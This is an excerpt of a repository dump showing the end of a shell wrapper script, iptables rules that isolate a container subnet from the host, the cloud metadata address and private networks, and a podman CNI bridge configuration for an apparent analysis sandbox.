19 |         if [ "$arg" == "-d" ]; then
20 |             NEWARGS+=("-detach")
21 |         else
22 |             NEWARGS+=("$arg")
23 |         fi
24 |     done
25 |     set -- "${NEWARGS[@]}"
26 | fi
27 | 
28 | exec "$BIN" "$@"


--------------------------------------------------------------------------------
/tools/network/iptables.rules:
--------------------------------------------------------------------------------
 1 | # Create the chain used by podman networking for user-defined rules
 2 | #
 3 | # Note: the subnet "172.16.16.0/24" used here must match the subnet
 4 | # used in podman-analysis.conflist.
 5 | *filter
 6 | :INPUT ACCEPT [0:0]
 7 | :CNI-ADMIN - [0:0]
 8 | # Block access to this host from the container network.
 9 | -A INPUT -s 172.16.16.0/24 -j DROP
10 | # Block access to metadata.google.internal/AWS metadata.
11 | -A CNI-ADMIN -d 169.254.169.254/32 -j DROP
12 | # Block access to Private address spaces.
13 | -A CNI-ADMIN -s 172.16.16.0/24 -d 10.0.0.0/8 -j DROP
14 | -A CNI-ADMIN -s 172.16.16.0/24 -d 172.16.0.0/12 -j DROP
15 | -A CNI-ADMIN -s 172.16.16.0/24 -d 192.168.0.0/16 -j DROP
16 | COMMIT
17 | 


--------------------------------------------------------------------------------
/tools/network/podman-analysis.conflist:
--------------------------------------------------------------------------------
 1 | {
 2 |   "cniVersion": "0.4.0",
 3 |   "name": "analysis-net",
 4 |   "plugins": [
 5 |     {
 6 |         "type": "bridge",
 7 |         "bridge": "cni-analysis",
 8 |         "isGateway": true,
 9 |         "ipMasq": true,
10 |         "hairpinMode": true,
11 |         "ipam": {
12 |             "type": "host-local",
13 |             "subnet": "172.16.16.0/24",
14 |             "routes": [
15 |                 { "dst": "0.0.0.0/0" }
16 |             ]
17 |         }
18 |     },
19 |     {
20 |         "type": "portmap",
21 |         "capabilities": { "portMappings": true }
22 |     },
23 |     {
24 |         "type": "firewall",
25 |         "backend": "iptables"
26 |     }
27 |   ]
28 | }
29 | 


--------------------------------------------------------------------------------